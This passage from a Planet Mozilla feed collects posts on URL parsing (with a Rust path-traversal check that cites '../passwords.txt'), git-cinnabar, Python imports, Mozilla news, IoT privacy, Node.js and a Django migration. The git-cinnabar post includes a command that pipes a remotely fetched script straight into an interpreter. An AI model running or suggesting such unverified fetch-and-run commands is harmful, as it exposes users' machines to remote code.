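To illustrate the kind of check involved (a minimal sketch in Rust, not code from any particular server; the function name and paths are made up for the example), a server can canonicalize the requested path and verify that it stays under the document root:

use std::fs;
use std::path::{Path, PathBuf};

fn resolve_safely(document_root: &Path, requested: &str) -> Option<PathBuf> {
    // Percent-decoding (e.g. %2e%2e -> ..) must happen before this check;
    // it is omitted here for brevity.
    let candidate = document_root.join(requested.trim_start_matches('/'));
    // Canonicalization collapses `..` segments and resolves symlinks,
    // and fails if the file does not exist.
    let canonical = fs::canonicalize(&candidate).ok()?;
    let root = fs::canonicalize(document_root).ok()?;
    if canonical.starts_with(&root) {
        Some(canonical)
    } else {
        // The request tried to escape the document root.
        None
    }
}

fn main() {
    let root = Path::new("/var/www");
    // A request like `GET ../passwords.txt HTTP/1.1` should never resolve.
    println!("{:?}", resolve_safely(root, "../passwords.txt"));
}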

You may have unexpected load failures if you have a web application that uses Content Security Policy and makes requests to the same host written in different ways. For example “http://example.com” and “http://ex%61mple.com” ought to be equal, and “http://[::0:abcd]” and “http://[::abcd]” are equal IPv6 addresses. Inconsistent host parsing has unexpected security implications.

Performance

Performance of URL parsers is an important consideration. There are not many applications where URL parsing is the slowest operation, but there are many operations involving URL parsing, so making URL parsing faster makes many operations a little bit faster. An ideal benchmark would measure performance of parsing real URLs from popular websites, but publishing such benchmarks is problematic because URLs often contain personally identifiable information, such as https://example.org/?user_id=57483. On such a benchmark, trunk WebKit’s URL parser is 20% faster than WebKit in Safari 10. In practice, most of the time is spent parsing the path and the query of URLs, which are often the longest and contain the most information, as well as the host, which requires the most encoding. A true apples-to-apples comparison of URL parsing among different browsers is impossible right now because behavior is so different.

TL;DR

URL implementations in browsers and elsewhere need to change and become more consistent and safe. Web developers need to adapt to such changes. If there are differences of opinion, we should discuss and resolve them. If change breaks things, we should consider what the Internet will be decades from now. Web standards conformance makes the Internet better for everyone.

If you have any questions or comments, please contact me at @alexfchr, or Jonathan Davis, Apple’s Web Technologies Evangelist, at @jonathandavis or web-evangelist@apple.com.

Planet MozillaParticipation Demos - Q4/2016

Participation Demos - Q4/2016 Find out what Participation has been up to in Q4 2016

Planet MozillaPixels, Politics and P2P – Internet Days Stockholm 2016

Internet Days Logo

I just got back from the Internet Days conference in Stockholm, Sweden. I was flattered when I was asked to speak at this prestigious event, but I had no idea until I arrived just how much fun it would be.

lanyard

I loved the branding of the conference as it was all about pixels and love. Things we now need more of – the latter more than the former. As a presenter, I felt incredibly pampered. I had a driver pick me up at the airport (which I didn’t know about, so I took the train) and I was put up in the pretty amazing Waterfront hotel connected to the convention centre of the conference.

chris loves internet

This was the first time I heard about the Internet Days, and for those who haven’t heard of it either, I can only recommend it. Imagine a mixture of a deep technical conference on all matters internet – connectivity, technologies and programming – mixed with a TED event on current political matters.

The technology setup was breathtaking. The stage tech was flawless and all the talks were streamed and live edited (mixed with slides). Thus they became available on YouTube about an hour after you delivered them. Wonderful work, and very rewarding as a presenter.

I talked in detail about my keynote in another post, so here are the others I enjoyed:

Juliana Rotich of BRCK and Ushahidi fame talked about connectivity for the world and how this is far from being a normal thing.

Erika Baker gave a heartfelt talk about how she doesn’t feel safe about anything that is happening in the web world right now and how we need to stop seeing each other as accounts but care more about us as people.

Incidentally, this reminded me a lot of my TEDx talk in Linz about making social media more social again:

The big bang to end the first day of the conference was of course the live Skype interview with Edward Snowden. In the one-hour interview he covered a lot of truths about security, privacy and surveillance, and he had many calls to action that any one of us can act on now.

What I liked most about him was how humble he was. His whole presentation was about how it doesn’t matter what will happen to him, how it is important to remember the others that went down with him, and how he wishes for us to use the information we have now to make sure our future is not one of silence and fear.

In addition to my keynote I also took part in a panel discussion on how to inspire creativity.

The whole conference was about activism of sorts. I had lots of conversations with privacy experts of all levels: developers, network engineers, journalists and lawyers. The only thing that is a bit of an issue is that most talks outside the keynotes were in Swedish, but having lots of people to chat with about important issues made up for this.

The speaker present was a certificate confirming that all the CO2 our travel created was offset by the conference, and an Arduino-powered robot used to teach kids. In general, the conference was about preservation and donating to good causes. There was a place where you could touch your conference pass and coins would fall into a hat, showing that your check-in meant the organisers donated a Euro to Doctors Without Borders.

The catering was stunning and, with the omission of meat, CO2 friendly. Instead of giving out water bottles, the drinks were glasses of water, which in Stockholm is in some cases better quality than bottled water.

I am humbled and happy that I could play my part in this great event. It gave me hope that the web isn’t just run over by trolls, privileged complainers and people who don’t care if this great gift of information exchange is being taken from us bit by bit.

Make sure to check out all the talks, it is really worth your time. Thank you to everyone involved in this wonderful event!

Planet MozillaFaster git-cinnabar graft of gecko-dev

Cloning Mozilla repositories from scratch with git-cinnabar can be a long process. Grafting them to gecko-dev is an equally long process.

The metadata git-cinnabar keeps is such that it can be exchanged, but it’s also structured in a way that doesn’t allow git push and fetch to do that efficiently, and pushing refs/cinnabar/metadata to github fails because it wants to push more than 2GB of data, which github doesn’t allow.

But with some munging before a push, it is possible to limit the push to a fraction of that size and stay within github limits. And inversely, some munging after fetching makes it possible to produce the metadata git-cinnabar wants.

The news here is that there is now a cinnabar head on https://github.com/glandium/gecko-dev that contains the munged metadata, and a script that fetches it and produces the git-cinnabar metadata in an existing clone of gecko-dev. An easy way to run it is to use the following command from a gecko-dev clone:

$ curl -sL https://gist.github.com/glandium/56a61454b2c3a1ad2cc269cc91292a56/raw/bfb66d417cd1ab07d96ebe64cdb83a4217703db9/import.py | git cinnabar python

On my machine, the process takes 8 minutes instead of more than an hour. Make sure you use git-cinnabar 0.4.0rc for this.

Please note this doesn’t bring the full metadata for gecko-dev, just the metadata as of yesterday. This may be updated irregularly in the future, but don’t count on that.

So, from there, you still need to add mercurial remotes and pull from there, as per the original workflow.

Planned changes for version 0.5 of git-cinnabar will alter the metadata format such that it will be exchangeable without munging, making the process simpler and faster.

Planet MozillaAvoiding multiple reads with top-level imports

Recently I’ve been working with various applications that require importing large JSON definition files which detail complex application settings. Often, these files are required by multiple auxiliary modules in the codebase. All principles of software engineering point towards importing this sort of file only once, regardless of how many secondary modules it is used in.

My instinctive approach to this would be to have a main handler module read in the file and then pass its contents as a class initialization argument:

# main_handler.py

import json

from module1 import Class1
from module2 import Class2

with open("settings.json") as f:
    settings = json.load(f)

init1 = Class1(settings=settings)
init2 = Class2(settings=settings)

The problem with this is that if you have an elaborate import process, and multiple files to import, it could start to look messy. I recently discovered that this multiple initialization argument approach isn’t actually necessary.

In Python, you can actually import the same settings loader module in the two auxiliary modules (module1 and module2), and Python will only load it once:

# main_handler.py

from module1 import Class1
from module2 import Class2

init1 = Class1()
init2 = Class2()

# module1.py

import settings_loader

class Class1:
    def __init__(self):
        self.settings = settings_loader.settings

# module2.py

import settings_loader

class Class2:
    def __init__(self):
        self.settings = settings_loader.settings

# settings_loader.py

import json

with open("settings.json") as f:
    print "Loading the settings file!"
    settings = json.load(f)

Now when we test this out in the terminal:

MRMAC:importtesting mruttley$
MRMAC:importtesting mruttley$
MRMAC:importtesting mruttley$ python main_handler.py
Loading the settings file!
MRMAC:importtesting mruttley$

Despite calling import settings_loader twice, Python actually only called it once. This is extremely useful but also could cause headaches if you actually wanted to import the file twice. If so, then I would include the settings importer inside the __init__() of each ClassX and instantiate it twice.

Planet MozillaDecember’s Featured Add-ons

Firefox Logo on blue background

Pick of the Month: Enhancer for YouTube

by Maxime RF
Watch YouTube on your own terms! Tons of customizable features, like ad blocking, auto-play setting, mouse-controlled volume, cinema mode, video looping, to name a few.

“All day long, I watch and create work-related YouTube videos. I think I’ve tried every video add-on. This is easily my favorite!”

Featured: New Tab Override

by Sören Hentzschel
Designate the page that appears every time you open a new tab.

“Simply the best, trouble-free, new tab option you’ll ever need.”

Nominate your favorite add-ons

Featured add-ons are selected by a community board made up of add-on developers, users, and fans. Board members change every six months. Here’s further information on AMO’s featured content policies.

If you’d like to nominate an add-on for featuring, please send it to amo-featured@mozilla.org for the board’s consideration. We welcome you to submit your own add-on!

Planet Mozilla2nd best in Sweden

“Probably the only person in the whole of Sweden whose code is used by all people in the world using a computer / smartphone / ATM / etc … every day. His contribution to the world is so large that it is impossible to understand the breadth.”

(translated motivation from the Swedish original page)

Thank you everyone who nominated me. I’m truly grateful, honored and humbled. You, my community, are what makes me keep doing what I do. I love you all!

To list “Sweden’s best developers” (the list and site are in Swedish) seems like a rather futile task, doesn’t it? Yet that’s something the Swedish IT and technology news site Techworld has been doing occasionally for the last several years, at two or three year intervals since 2008.

Everyone reading this will of course immediately start to ponder on what developers they speak of or how they define developers and how on earth do you judge who the best developers are? Or even who’s included in the delimiter “Sweden” – is that people living in Sweden, born in Sweden or working in Sweden?

I’m certainly not alone in having chuckled to these lists when they have been published in the past, as I’ve never seen anyone on the list be even close to my own niche or areas of interest. The lists have even worked a little as a long-standing joke in places.

It always felt as if the people on the lists were found on another planet than mine – mostly just Java and .NET people, and they very rarely appeared to be developers who actually spend their days surrounded by code and programming. I suppose I’ve now given away some clues to some characteristics I think “a developer” should possess…

This year, their fifth time doing this list, they changed the way they find candidates, opened up for external nominations and had a set of external advisors. This also resulted in me finding several friends on the list that were never on it in the past.

Tonight I got called onto the stage during the little award ceremony and I was handed this diploma and recognition for landing at second place in the best developer in Sweden list.

And just to keep things safe for the future, this is how the listing looks on the Swedish list page:

Yes I’m happy and proud and humbled. I don’t get this kind of recognition every day so I’ll take this opportunity and really enjoy it. And I’ll find a good spot for my diploma somewhere around the house.

I’ll keep a really big smile on my face for the rest of the day for sure!

(Photo from the award ceremony by Emmy Jonsson/IDG)

Planet MozillaRemember when we Protected Net Neutrality in the U.S. ?

We may have to do it again. Importantly, we can and we will.

President-Elect Trump has picked his members of the “agency landing team” for the Federal Communications Commission. Notably, two of them are former telecommunications executives who weren’t supportive of the net neutrality rules ultimately adopted on February 25, 2015. There is no determination yet of who will ultimately lead the FCC – that will likely wait until next year. However, the current “landing team” picks have people concerned that the rules enacted to protect net neutrality – the table stakes for an open internet – are in jeopardy of being thrown out.

Is this possible? Of course it is – but it isn’t quite that simple. We should all pay attention to these picks – they are important for many reasons – but we need to put this into context.

The current FCC, who ultimately proposed and enacted the rules, faced a lot of public pressure in its process of considering them. The relevant FCC docket on net neutrality (“Protecting and Promoting the Open Internet”) currently contains 2,179,599 total filings from interested parties. The FCC also received 4 million comments from the public – most in favor of strong net neutrality rules. It took all of our voices to make it clear that net neutrality was important and needed to be protected.

So, what can happen now? Any new administration can reconsider the issue. We hope they don’t. We have been fighting this fight all over the world, and it would be nice to continue to count the United States as among the leaders on this issue, not one of the laggards. But, if the issue is revisited – we are all still here, and so are others who supported and fought for net neutrality.

We all still believe in net neutrality and in protecting openness, access and equality. We will make our voices heard again. As Mozilla, we will fight for the rules we have – it is a fight worth having. So, pay attention to what is going on in these transition teams – but remember we have strength in our numbers and in making our voices heard.

image from Mozilla 2014 advocacy campaign and petition

Planet MozillaWhy I’m joining Mozilla’s Board, by Julie Hanna

Today, I’m joining Mozilla’s Board. What attracts me to Mozilla is its people, mission and values. I’ve long admired Mozilla’s noble mission to ensure the internet is free, open and accessible to all. That Mozilla has organized itself in a radically transparent, massively distributed and crucially equitable way is a living example of its values in action and a testament to the integrity with which Mozillians have pursued that mission. They walk the talk. Similarly, having had the privilege of knowing a number of the leaders at Mozilla, their sincerity, character and competence are self-evident.

Julie Hanna, new Mozilla Corporation Board member (Photo credit: Chris Michel)

The internet is the most powerful force for good ever invented. It is the democratic air half our planet breathes. It has put power into the hands of people that didn’t have it. Ensuring the internet continues to serve our humanity, while reaching all of humanity is vital to preserving and advancing the internet as a public good.

The combination of these things is why helping Mozilla maximize its impact is an act with profound meaning and a privilege for me.

Mozilla’s mission is bold, daring and simple, but not easy. Preserving the web as a force for good and ensuring the balance of power between all stakeholders – private, commercial, national and government interests – while preserving the rights of individuals, by its nature, is a never ending challenge. It is a deep study in choice, consequence and unintended consequences over the short, medium and long term. Understanding the complex, nuanced and dynamic forces at work so that we can skillfully and collaboratively architect a digital organism that’s in service to the greater public good is by its very nature complicated.

And then there’s the challenge all organizations face in today’s innovate or die world – how to stay agile, innovative, and relevant, while riding the waves of disruption. Not for the faint of heart, but incredibly worthwhile and consequential to securing the future of the internet.

I subscribe to the philosophy of servant leadership. When it comes to Board service, my emphasis is on the service part. First and foremost, being in service to the mission and to Mozillians, who are doing the heavy lifting on the front lines. I find that a mindset of radical empathy and humility is critical to doing this effectively. The invisible work of deep listening and effort to understand what it’s like to walk a mile in their shoes. As is creating a climate of trust and psychological safety so that tough strategic issues can be discussed with candor and efficiency. Similarly, cultivating a creative tension so diverse thoughts and ideas have the headroom to emerge in a way that’s constructive and collaborative. My continual focus is to listen, learn and be of service in the areas where my contribution can have the greatest impact.

Mozilla is among the pioneers of Open Source Software. Open Source Software is the foundation of an open internet and a pervasive building block in 95% of all applications. The net effect is a shared public good that accelerates innovation. That will continue. Open source philosophy and methodology are also moving into other realms like hardware and medicine. This will also continue. We tend to overestimate the short term impact of technology and underestimate its long term effect. I believe we’ve only begun catalyzing the potential of open source.

Harnessing the democratizing power of the internet to enable a more just, abundant and free world is the long running purpose that has driven my work. The companies I helped start and lead, the products I have helped build all sought to democratize access to information, communication, collaboration and capital on a mass scale. None of that would have been possible without the internet. This is why I passionately believe that the world needs Mozilla to succeed and thrive in fulfilling its mission.

This post was re-posted on Julie’s Medium channel.

Planet Mozilla45.5.1 available, and 32-bit Intel Macs go Tier-3

Test builds for 45.5.1, with the single change being the safety fix for the Firefox 0-day in bug 1321066 (CVE-2016-9079), are now available. Release notes and hashes to follow when I'm back from my business trip late tonight. I will probably go live on this around the same time, so please test as soon as you can.

In other news, the announcement below was inevitable after Mozilla dropped support for 10.6 through 10.8, but for the record (from BDS):

As of Firefox 53, we are intending to switch Firefox on mac from a universal x86/x86-64 build to a single-architecture x86-64 build.

To simplify the build system and enable other optimizations, we are planning on removing support for universal mac build from the Mozilla build system.

The Mozilla build and test infrastructure will only be testing the x86-64 codepaths on mac. However, we are willing to keep the x86 build configuration supported as a community-supported (tier 3) build configuration, if there is somebody willing to step forward and volunteer as the maintainer for the port. The maintainer's responsibility is to periodically build the tree and make sure it continues to run.

Please contact me directly (not on the list) if you are interested in volunteering. If I do not hear from a volunteer by 23-December, the Mozilla project will consider the Mac-x86 build officially unmaintained.

The precipitating event for this is the end of NPAPI plugin support (see? TenFourFox was ahead of the curve!), except, annoyingly, Flash, with Firefox 52. The only major reason 32-bit Mac Firefox builds weren't ended with the removal of 10.6 support (10.6 being the last version of Mac OS X that could run on a 32-bit Intel Mac) was for those 64-bit Macs that had to run a 32-bit plugin. Since no plugins but Flash are supported anymore, and Flash has been 64-bit for some time, that's the end of that.

Currently we, as OS X/ppc, are a Tier-3 configuration also, at least for as long as we maintain source parity with 45ESR. Mozilla has generally been careful not to intentionally break TenFourFox, and the situation with 32-bit x86 would probably be easier than ours. That said, candidly I can only think of two non-exclusive circumstances where maintaining the 32-bit Intel Mac build would be advantageous, and they're both bigger tasks than simply building the browser for 32 bits:

  • You still have to run a 32-bit plugin like Silverlight. In that case, you'd also need to undo the NPAPI plugin block (see bug 1269807) and everything underlying it.
  • You have to run Firefox on a 32-bit Mac. As a practical matter this would essentially mean maintaining support for 10.6 as well, roughly option 4 when we discussed this in a prior blog post with the added complexity of having to pull the legacy Snow Leopard support forward over a complete ESR cycle. This is non-trivial, but hey, we've done just that over six ESR cycles, although we had the advantage of being able to do so incrementally.

I'm happy to advise anyone who wants to take this on but it's not something you'll see coming from me. If you decide you'd like to try, contact Benjamin directly (his first name, smedbergs, us).

Planet MozillaWhat’s Up with SUMO – 1st December

Greetings, SUMO Nation!

This is it! The start of the last month of the year, friends :-) We are kicking off the 12th month of 2016 with some news for your reading pleasure. Dig in!

Welcome, new contributors!

If you just joined us, don’t hesitate – come over and say “hi” in the forums!

Contributors of the week

Don’t forget that if you are new to SUMO and someone helped you get started in a nice way you can nominate them for the Buddy of the Month!

SUMO Community meetings

Community

Platform

Social

  • Reminder: Army of Awesome (as a “community trademark”) is going away. Please reach out to the Social Support team or ask in #sumo for more information.
  • Remember, you can contact Sierra (sreed@), Elisabeth (ehull@), or Rachel (guigs@) to get started with Social support. Help us provide friendly help through the likes of @firefox, @firefox_es, @firefox_fr and @firefoxbrasil on Twitter and beyond :-)

Support Forum

  • If you see Firefox users asking about the “zero day exploit”, please let them know that “We have been made aware of the issue and are working on a fix.  We will have more to say once the fix has been shipped.” (some media context here)
  • A polite reminder: please do not delete posts without an explanation to the poster in the forums, it can be frustrating to both the author and the user in the thread – thank you!

Knowledge Base & L10n

Firefox

  • for iOS
    • Firefox for iOS 6.0 coming up your way before the end of this year, we hear! :-)

…and that’s it for today! So, what are you usually looking forward to about December? For me it would be the snow (not the case any more, sadly) and a few special dishes… Well, OK, also the fun party on the last night of the year in our calendar! Let us hear from you about your December picks – tell us in the forums or in the comments!

Planet MozillaJulie Hanna Joins the Mozilla Corporation Board of Directors

This post was originally posted on the Mozilla.org website.

Julie Hanna, new Mozilla Corporation Board member

Today, we are very pleased to announce the latest addition to the Mozilla Corporation Board of Directors – Julie Hanna. Julie is the Executive Chairman for Kiva and a Presidential Ambassador for Global Entrepreneurship and we couldn’t be more excited to have her joining our Board.

Throughout this year, we have been focused on board development for both the Mozilla Foundation and the Mozilla Corporation boards of directors. We envisioned a diverse group who embodied the same values and mission that Mozilla stands for. We want each person to contribute a unique point of view. After extensive conversations, it was clear to the Mozilla Corporation leadership team that Julie brings exactly the type of perspective and approach that we seek.

Born in Egypt, Julie has lived in various countries including Jordan and Lebanon before finally immigrating to the United States. Julie graduated from the University of Alabama at Birmingham with a B.S. in Computer Science. She currently serves as Executive Chairman at Kiva, a peer-to-peer lending pioneer and the world’s largest crowdlending marketplace for underserved entrepreneurs. During her tenure, Kiva has scaled its reach to 190+ countries and facilitated nearly $1 billion in loans to 2 million people with a 97% repayment rate. U.S. President Barack Obama appointed Julie as a Presidential Ambassador for Global Entrepreneurship to help develop the next generation of entrepreneurs. In that capacity, her signature initiative has delivered over $100M in capital to nearly 300,000 women and young entrepreneurs across 86 countries.

Julie is known as a serial entrepreneur with a focus on open source. She was a founder or founding executive at several innovative technology companies directly relevant to Mozilla’s world in browsers and open source. These include Scalix, a pioneering open source email/collaboration platform and developer of the most advanced AJAX application of its time, the first enterprise portal provider 2Bridge Software, and Portola Systems, which was acquired by Netscape Communications and became Netscape Mail.

She has also built a wealth of experience as an active investor and advisor to high-growth technology companies, including sharing economy pioneer Lyft, Lending Club and online retail innovator Bonobos. Julie also serves as an advisor to Idealab, Bill Gross’ highly regarded incubator which has launched dozens of IPO-destined companies.

Please join me in welcoming Julie Hanna to the Mozilla Board of Directors.

Mitchell

Background:

Twitter: @JulesHanna

High-res photo

Planet MozillaJulie Hanna Joins the Mozilla Corporation Board of Directors

Today, we are very pleased to announce the latest addition to the Mozilla Corporation Board of Directors – Julie Hanna. Julie is the Executive Chairman for Kiva and a Presidential Ambassador for Global Entrepreneurship and we couldn’t be more excited to have her joining our Board.

Throughout this year, we have been focused on board development for both the Mozilla Foundation and the Mozilla Corporation boards of directors. We envisioned a diverse group who embodied the same values and mission that Mozilla stands for. We want each person to contribute a unique point of view. After extensive conversations, it was clear to the Mozilla Corporation leadership team that Julie brings exactly the type of perspective and approach that we seek.

Born in Egypt, Julie has lived in various countries including Jordan and Lebanon before finally immigrating to the United States. Julie graduated from the University of Alabama at Birmingham with a B.S. in Computer Science. She currently serves as Executive Chairman at Kiva, a peer-to-peer lending pioneer and the world’s largest crowdlending marketplace for underserved entrepreneurs. During her tenure, Kiva has scaled its reach to 190+ countries and facilitated nearly $1 billion in loans to 2 million people with a 97% repayment rate. U.S. President Barack Obama appointed Julie as a Presidential Ambassador for Global Entrepreneurship to help develop the next generation of entrepreneurs. In that capacity, her signature initiative has delivered over $100M in capital to nearly 300,000 women and young entrepreneurs across 86 countries.

Julie is known as a serial entrepreneur with a focus on open source. She was a founder or founding executive at several innovative technology companies directly relevant to Mozilla’s world in browsers and open source. These include Scalix, a pioneering open source email/collaboration platform and developer of the most advanced AJAX application of its time, the first enterprise portal provider 2Bridge Software, and Portola Systems, which was acquired by Netscape Communications and became Netscape Mail.

She has also built a wealth of experience as an active investor and advisor to high-growth technology companies, including sharing economy pioneer Lyft, Lending Club and online retail innovator Bonobos. Julie also serves as an advisor to Idealab, Bill Gross’ highly regarded incubator which has launched dozens of IPO-destined companies.

Please join me in welcoming Julie Hanna to the Mozilla Board of Directors.

Mitchell

You can read Julie’s message about why she’s joining Mozilla here.

Background:

Twitter: @JulesHanna

High-res photo (photo credit: Chris Michel)

Planet MozillaConnected Devices Weekly Program Update, 01 Dec 2016

Connected Devices Weekly Program Update Weekly project updates from the Mozilla Connected Devices team.

Planet MozillaState of Mozilla 2015 Annual Report

We just released our State of Mozilla annual report for 2015. This report highlights key activities for Mozilla in 2015 and includes detailed financial documents.

Mozilla is not your average company. We’re a different kind of organization – a nonprofit, global community with a mission to ensure that the internet is a global public resource, open and accessible to all.

I hope you enjoy reading and learning more about Mozilla and our developments in products, web technologies, policy, advocacy and internet health.

Planet MozillaWebinar 2: What is Equal Rating.

Webinar 2: What is Equal Rating. Overview of Equal Rating

Planet MozillaThe Problem with Privacy in IoT

Every year Mozilla hosts DinoTank, an internal pitch platform, and this year instead of pitching ideas we focused on pitching problems. To give each DinoTank winner the best possible start, we set up a design sprint for each one. This is the first installment of that series of DinoTank sprints…

The Problem

I work on the Internet of Things at Mozilla but I am apprehensive about bringing most smart home products into my house. I don’t want a microphone that is always listening to me. I don’t want an internet connected camera that could be used to spy on me. I don’t want my thermostat, door locks, and light bulbs all collecting unknown amounts of information about my daily behavior. Suffice it to say that I have a vague sense of dread about all the new types of data being collected and transmitted from inside my home. So I pitched this problem to the judges at DinoTank. It turns out they saw this problem as important and relevant to Mozilla’s mission. And so to explore further, we ran a 5 day product design sprint with the help of several field experts.

Brainstorming

A team of 8 staff members was gathered in San Francisco for a week of problem refinement, insight gathering, brainstorming, prototyping, and user testing. Among us we had experts in Design Thinking, user research, marketing, business development, engineering, product, user experience, and design. The diversity of skillsets and backgrounds allowed us to approach the problem from multiple different angles, and through our discussion several important questions arose which we would seek to answer by building prototypes and putting them in front of potential consumers.

The Solution

After 3 days of exploring the problem, brainstorming ideas and then narrowing them down, we settled on a single product solution. It would be a small physical device that plugs into the home’s router to monitor the network activity of local smart devices. It would have a control panel that could be accessed from a web browser. It would allow the user to keep up to date through periodic status emails, and only in critical situations would it notify the user’s phone with needed actions. We mocked up an end-to-end experience using clickable and paper prototypes, and put it in front of privacy-aware IoT home owners.


What We Learned


Surprisingly, our test users saw the product as more of an all-inclusive internet security system rather than an IoT-only solution. One of our solutions focused more on 'data protection', and here we clearly learned that there is a sense of resignation towards large-scale data collection, with comments like "Google already has all my data anyway."

Of the positive learnings, the mobile notifications really resonated with users. And interestingly — though not surprisingly — people became much more interested in the privacy aspects of our mock-ups when their children were involved in the conversation.

Next Steps


The big question we were left with was: is this a latent but growing problem, or was this never a problem at all? To answer this, we will tweak our prototypes to test different market positioning of the product as well as explore potential audiences that have a larger interest in data privacy.

My Reflections

Now, if I had done this project without DinoTank’s help, I probably would have started by grabbing a Raspberry Pi and writing some code. But instead I learned how to take a step back and start by focusing on people. Here I learned about evaluating a user problem, sussing out a potential solution, and testing its usefulness in front of users. And so regardless of what direction we now take, we didn’t waste any time because we learned about a problem and the people whom we could reach.

If you’re looking for more details about my design sprint you can find the full results in our report. If you would like to learn more about the other DinoTank design sprints, check out the tumblr. And if you are interested in learning more about the methodologies we are using, check out our Open Innovation Toolkit.

People I’d like to thank:

Katharina Borchert, Bertrand Neveux, Christopher Arnold, Susan Chen, Liz Hunt, Francis Djabri, David Bialer, Kunal Agarwal, Fabrice Desré, Annelise Shonnard, Janis Greenspan, Jeremy Merle and Rina Jensen.


The Problem with Privacy in IoT was originally published in Mozilla Open Innovation on Medium, where people are continuing the conversation by highlighting and responding to this story.

Planet MozillaMozilla and Node.js

Recently the Node.js Foundation announced that Mozilla is joining forces with IBM, Intel, Microsoft, and NodeSource on the Node.js API. So what’s Mozilla doing with Node? Actually, a few things…

You may already know about SpiderNode, a Node.js implementation on SpiderMonkey, which Ehsan Akhgari announced in April. Ehsan, Trevor Saunders, Brendan Dahl, and other contributors have since made a bunch of progress on it, and it now builds successfully on Mac and Linux and runs some Node.js programs.

Brendan additionally did the heavy lifting to build SpiderNode as a static library, link it with Positron, and integrate it with Positron’s main process, improving that framework’s support for running Electron apps. He’s now looking at opportunities to expose SpiderNode to WebExtensions and to chrome code in Firefox.

Meanwhile, I’ve been analyzing the Node.js API being developed by the API Working Group, and I’ve also been considering opportunities to productize SpiderNode for Node developers who want to use emerging JavaScript features in SpiderMonkey, such as WebAssembly and Shared Memory.

If you’re a WebExtension developer or Firefox engineer, would you use Node APIs if they were available to you? If you’re a Node programmer, would you use a Node implementation running on SpiderMonkey? And if so, would you require Node.js Addons (i.e. native modules) to do so?

Planet MozillaReps Weekly Meeting Dec. 01, 2016

Reps Weekly Meeting Dec. 01, 2016: a weekly call with some of the Reps to discuss all matters about/affecting Reps and invite Reps to share their work with everyone.

Planet MozillaUsing a fully free OS for devices in the home

There are more and more devices around the home (and in many small offices) running a GNU/Linux-based firmware. Consider routers, entry-level NAS appliances, smart phones and home entertainment boxes.

More and more people are coming to realize that there is a lack of security updates for these devices and a big risk that the proprietary parts of the code are either very badly engineered (if you don't plan to release your code, why code it properly?) or deliberately include spyware that calls home to the vendor, ISP or other third parties. IoT botnet incidents, which are becoming more widely publicized, emphasize some of these risks.

On top of this is the frustration of trying to become familiar with numerous different web interfaces (for your own devices and those of any friends and family members you give assistance to) and the fact that many of these devices have very limited feature sets.

Many people hail OpenWRT as an example of a free alternative (for routers), but I recently discovered that OpenWRT's web interface won't let me enable both DHCP and DHCPv6 concurrently. The underlying OS and utilities fully support dual stack, but the UI designers haven't encountered that configuration before. Conclusion: move to a device running a full OS, probably Debian-based, but I would consider BSD-based solutions too.

For many people, the benefit of this strategy is simple: use the same skills across all the different devices, at home and in a professional capacity. Get rapid access to security updates. Install extra packages or enable extra features if really necessary. For example, I already use Shorewall and strongSwan on various Debian boxes and I find it more convenient to configure firewall zones using Shorewall syntax rather than OpenWRT's UI.

Which boxes to start with?

There are various considerations when going down this path:

  • Start with existing hardware, or buy new devices that are easier to re-flash? Sometimes there are other reasons to buy new hardware, for example when upgrading a broadband connection to Gigabit, or when an older NAS gets a noisy fan or struggles with SSD performance; in these cases, the decision about what to buy can be limited to those devices that are optimal for replacing the OS.
  • How will the device be supported? Can other non-technical users do troubleshooting? If mixing and matching components, how will faults be identified? If buying a purpose-built NAS box and the CPU board fails, will the vendor provide next day replacement, or could it be gone for a month? Is it better to use generic components that you can replace yourself?
  • Is a completely silent/fanless solution necessary?
  • Is it possible to completely avoid embedded microcode and firmware?
  • How many other free software developers are using the same box, or will you be first?

Discussing these options

I recently started threads on the debian-user mailing list discussing options for routers and home NAS boxes. A range of interesting suggestions has already appeared; it would be great to see any other ideas that people have about these choices.

Planet MozillaTaco Bell Parallel Programming

While working on migrating support.mozilla.org away from Kitsune (which is a great community support platform that needs love, remember that internet) I needed to convert about 4M database rows from a custom, Markdown-inspired format to HTML.

The challenge of the task is that it needs to happen as fast as possible so we can dump the database, convert the data and load the database onto the new platform with the minimum possible time between the first and the last step.

I started a fresh MySQL container and started hacking:

Load the database dump

Kitsune's database weighs about 35GiB, so creating and loading the dump is a lengthy procedure. I used some tricks taken from different places, the most notable ones being:

  • Set innodb_flush_log_at_trx_commit = 2 for more speed. This should not be used in production as it may break ACID compliance but for my use case it's fine.

  • Set innodb_write_io_threads = 16

  • Set innodb_buffer_pool_size=16G and innodb_log_file_size=4G. I read that innodb_log_file_size is recommended to be 1/4th of innodb_buffer_pool_size, and I set the latter based on my available memory.

Loading the database dump takes about 60 minutes. I'm pretty sure there's room for improvement there.

Extra tip: When dumping such huge databases from production websites make sure to use a replica host and mysqldump's --single-transaction flag to avoid locking the database.

Create a place to store the processed data

Kitsune being a Django project, I created extra fields named content_html on the models with markdown content, generated the migrations and ran them against the db.

Process the data

An AWS m4.2xl gives me 8 cores and 32GiB of memory, 16 of which I allocated to MySQL earlier.

I started with a basic single-core solution:

for question in Question.objects.all():
    question.content_html = parser.wiki_2_html(question.content)
    question.save()

which obviously does the job but it's super slow.

Transactions take a fair amount of time, what if we could bundle multiple saves into one transaction?

def chunks(count, nn=500):
    """Yield successive (offset, offset + nn) ranges covering count rows."""
    offset = 0

    while True:
        yield (offset, min(offset + nn, count))
        offset += nn
        if offset >= count:
            break

for low, high in chunks(Question.objects.count()):
    with transaction.atomic():
        for question in Question.objects.all()[low:high]:
            question.content_html = parser.wiki_2_html(question.content)
            question.save()

This is getting better. Increasing the chunk size to 20000 items, at the cost of more RAM, produces faster results. Anything above this value seems to take about the same time to complete.

I tried PyPy and didn't get better results, so I defaulted to CPython.

Let's add some more cores into the mix using Python's multiprocessing library.

I created a Pool with 7 processes (always leave one core outside the Pool so the system remains responsive) and used apply_async to submit the chunks to be processed by the Pool.

import multiprocessing as mp
from time import sleep

results = []
it = Question.objects.all()
number_of_rows = it.count()
pool = mp.Pool(processes=7)
[pool.apply_async(process_chunk, (chunk,), callback=results.append) for chunk in chunks(number_of_rows)]

sum_results = 0
while sum_results < number_of_rows:
    print 'Progress: {}/{}'.format(sum_results, number_of_rows)
    sum_results = sum(results)
    sleep(1)

Function process_chunk will process, save and return the number of rows processed. apply_async will then append this number to results via the callback, which is used in the while loop to give me an overview of what's happening while I'm waiting.

So far so good, this is significantly faster. It took some tries to get this right. Two things to remember when dealing with multiprocessing and Django are:

  • ./manage.py shell won't work. I don't know why, but I went ahead and wrote a standalone Python script, imported django and ran django.setup().

